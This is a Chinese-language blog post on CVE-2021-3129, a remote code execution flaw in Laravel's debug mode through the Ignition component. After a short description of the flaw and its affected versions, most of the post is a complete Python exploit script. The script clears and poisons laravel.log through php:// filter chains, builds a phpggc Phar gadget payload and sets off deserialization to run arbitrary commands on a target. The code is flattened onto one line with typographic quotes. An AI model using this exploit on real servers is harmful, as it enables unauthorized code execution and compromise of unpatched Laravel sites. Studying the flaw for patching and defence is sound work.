# Laravel Debug mode RCE CVE-2021-3129
Laravel是一套簡潔、開源的PHP Web開發框架(PHP Web Framework),旨在實現Web軟件的MVC架構。
2021年01月12日,Laravel被披露存在一個遠程代碼執行漏洞(CVE-2021-3129)。當Laravel開啟了Debug模式時,由於Laravel自帶的Ignition組件對file_get_contents()和file_put_contents()函數的不安全使用,攻擊者可以通過發起惡意請求,構造惡意Log文件等方式觸發Phar反序列化,最終造成遠程代碼執行。
==影響範圍==
Laravel <= 8.4.2 Ignition <2.5.2 ==漏洞環境== Github:https://github.com/SNCKER/CVE-2021-3129 ==漏洞利用==
# -*- coding=utf-8 -*- # Author : Crispr import os import requests import sys class EXP: #这里还可以增加phpggc的使用链,经过测试发现RCE5可以使用 __gadget_chains = { “monolog_rce5″:r””” php -d “phar.readonly=0” ./phpggc Laravel/RCE5 “%s” –phar phar -o php://output | base64 -w 0 | python -c “import sys;print(”.join([‘=’ + hex (ord(i))[2:] + ‘=00’ for i in sys.stdin.read()]).upper())” “”” } def __vul_check(self): res = requests.get(self.__url,verify=False) if res.status_code != 405 and “laravel” not in res.text: print(“[+]Vulnerability does not exist”) return False return True def __payload_send(self,payload): header = { “Accept”: “application/json” } data = { “solution”: “Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution”, “parameters”: { “variableName”: “cve20213129”, “viewFile”: “” } } data[“parameters”][“viewFile”] = payload print(data) res = requests.post(self.__url, headers=header, json=data, verify=False) return res def __clear_log(self): payload = “php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log” return self.__payload_send(payload=payload) def __generate_payload(self,gadget_chain): generate_exp = self.__gadget_chains[gadget_chain] % self.__command #print(generate_exp) exp = “”.join(os.popen(generate_exp).readlines()).replace(“\n”,””)+ ‘a’ print(“[+]exploit:”) print(exp) return exp def __decode_log(self): return self.__payload_send( “php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log”) def __unserialize_log(self): return self.__payload_send(“phar://../storage/logs/laravel.log/test.txt”) def __rce(self): text = str(self.__unserialize_log().text) #print(text) text = text[text.index(‘]’):].replace(“}”,””).replace(“]”,””) return text def exp(self): for gadget_chain in self.__gadget_chains.keys(): print(“[*] Try to use %s for exploitation.” % (gadget_chain)) self.__clear_log() self.__clear_log() self.__payload_send(‘A’ * 2) self.__payload_send(self.__generate_payload((gadget_chain))) self.__decode_log() print(“[*] Result:”) print(self.__rce()) def __init__(self, target, command): self.target = target self.__url = requests.compat.urljoin(target, “_ignition/execute-solution”) self.__command = command if not self.__vul_check(): print(“[-] [%s] is seems not vulnerable.” % (self.target)) print(“[*] You can also call obj.exp() to force an attack.”) else: self.exp() def main(): EXP(“http://127.0.0.1:8888”,sys.argv[1]) if __name__ == “__main__”: main()
Github:https://github.com/crisprss/Laravel_CVE-2021-3129_EXP
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容